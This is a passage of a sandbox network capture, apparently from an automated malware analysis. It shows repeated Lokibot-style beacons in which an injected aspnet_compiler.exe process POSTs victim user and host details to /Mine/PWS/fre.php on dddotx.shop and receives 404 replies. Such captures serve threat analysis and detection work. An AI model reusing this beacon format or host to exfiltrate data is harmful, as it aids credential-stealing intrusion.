Sep 25, 2024 15:28:54.379558086 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlAjJ8Qg6Ff6%2BgP4TQX37tzjqpqjM9tzK2CQWH17DRMtL6AVe0%2BU7be5hXxd0359%2B5blwEXSy5fHPFmehABuH%2BUfY0WSJ0KMJx7xrDr2iA2VJaV7OPdNnzxGyxxRhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c2a4ea17d18-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	55895	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:54.532691956 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:54.537764072 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:55.229852915 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtT02wdkKW0NiE6Gsijqu4V3%2BjuGyqbIuFoAdXovGJJL%2Bjh0ryKOeDEvO%2FYa4UkzeyXjRMceZBpKsfthTCfIefeSzdu21h2lFmodgkjJNeYmtwOAizvTQmpBL7cusQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c2f5c0c5e76-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	55896	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:55.508654118 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:55.513578892 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:56.263027906 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CgVtUfzbdU%2BspHap4sRciP6hQpKJST12uEnPafC8Ah5q5%2FHGOjFAuoItHpevTcFXcMtaPUOaFYTgehH6jnar3%2Bldm0lEzsNLIJlY0%2BjdhMAZif2pWDf2eOLeTs0FqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c357b058c0c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	55897	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:56.407444000 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:56.412404060 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:57.191807985 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XuGHxOcWUC0ysvT2VmTBfS8bj%2BItpq%2Bnfr3Abdd6Kkb1RgKifoYmtXFin1Ton75loC9dhkkpZi3XdT4NlQIpjLtKPesn7dPCwpMc0TVo7dYLvwsdHp38cd1Kkjshfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c3b2d1a0f83-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	55898	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:57.593775988 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:57.598722935 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:58.321290016 CEST	561	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9SgeCtD74V9z6FzuVFMUtfv6wTty84L8LyRpUr4lsKH7zxkg45vOwo4WmGbN6CUkVAXtFazh75NYDmh52unJ3rZt8R5ddobG7xrKvLKKkB8T3hs5GD5UruE3yc2qQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c427f056a55-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	55899	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:58.469784975 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:58.474678040 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:28:59.169311047 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:28:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0erpvwprs%2F1GlF1S2zhM66LqDqIvZUEp7vYse%2B0lXu9IA8xAFoD%2BDsd3kNo3AqXmG0bPa84CcrzEF6Hasgvz0Q539xRtmuA0HwQYxGpXBz9s1DAUVAG1Cz6rnXv%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c47fdfe4246-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	55900	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:28:59.477629900 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:28:59.484195948 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:00.300595045 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xV%2BB5qD1Yd3zPOgd8f2rP6tfzCIFL18jrdOSkEMQb9vMvMU6PNf8rueozDe7CmOCGiUjv42%2FtwGAmBhvpGkhkZ6uBxedCUNcKGbzFRhiViUxyFg0RsxNx%2FAQMOqzKw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c4e5ef34304-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	55901	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:00.468620062 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:00.473536015 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:01.202205896 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Y2YrUsCod5f6rEk2RjWB5or%2FgQNV4s2y1c%2FP8h29H%2B0vQjW66XsN2PVCKx7KlJBG1VcVKMGYSFv6584O3X%2BM1dXcdlWwGPthPq6UiQXS9tlpbEl4rTYNZvS628pgA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c548e43c448-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	55902	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:01.367449045 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:01.372432947 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:02.085413933 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjaS1C%2B5qyGeUVkysgFhLS7yN4MId4T2nL5Txdh9gKuqS9q6eUDmrXaFKCQY9tysJYdaAqVcMxFIpEOqoVxifdXMdD%2FOOWzoITlpCJcyPc604sG7F1rYn%2FuI0g7NbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c5a1fc3c3f5-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	55903	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:02.234904051 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:02.239881039 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:03.023292065 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NdkSRxxj5GgSbDnDU4wQjq4kN9vggs1VEHzSjB5NpdNwqH5Qy1whvD2Fvg76FCQ9DsCwHHWRuIXP4tp4TIDH%2F5zHZUi96NURjzQIaCYkVJAOdn%2FbOCYaGlCvkXUug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c5f9f130c8e-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	55904	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:03.271222115 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:03.276279926 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:03.936767101 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyxAcmXOfmyZHmlfTUdxE4hEL%2B5fKlmDYmp6L33qxOrVOSVo1rhveg2zpXwYx8Kh1wB%2BgJIca89JvOt37SqCBR8xM92MC1laLkIBZaVtUi8xQKqXj6IlyOHIRyTxNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c65cbd54368-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	55905	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:04.094444990 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:04.099860907 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:04.757303953 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7H0voRf4Ea7ANWxnKVc9K4%2FXsB8L8JWatlt%2BTGsZvO42aH2necDqzlj6iAd%2F3fv4umbdItfK2jRLKxN6N70OER6sL9ExURXSEQevKmS4aW2GeKzd0lKyiPXXknDixw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c6b1f0742dc-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	55906	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:04.908715010 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:04.914671898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:05.574727058 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxwbX%2FW%2FSD9KTpSDTVKvqkGZEEloWbfvEP4FdC9czI5fbe4SoAcZjim5TGUJzEBOmwDkVmsbg9CNkGFjLRb01vVxuCcXyzKHd%2BXXHGvRbA87Q5a148kkJ3RO3lX3KQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c702b3d4299-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	55907	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:05.718041897 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:05.723093033 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:06.426374912 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIaVLwL3fCDsNslpZyd8seavraM6aeYYT%2FZReyDml5LIXtJupZzOSQZPXNeL0aos34PBBHIpEPeXvwWeBmJahdtyiVkwsstiXA81Ro%2BGOhO2p8P%2B2ZgAg8tf5bY3Vg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c753f0d72a1-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	55908	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:06.582248926 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:06.587970972 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:07.270327091 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nG%2BHNvFNULyT4%2FWAOFCzIX4eFuLkMqg88C6OhEEyWIZh6vYLNNcRncuI4bx0Zf7XAN5E2FI6Leomfwm3j74aD6sUDivQ7TGDpuCiNVQIWfhjMPznHtSg4Qw2FsMhcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c7abcef0f9f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	55909	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:07.444246054 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:07.449996948 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
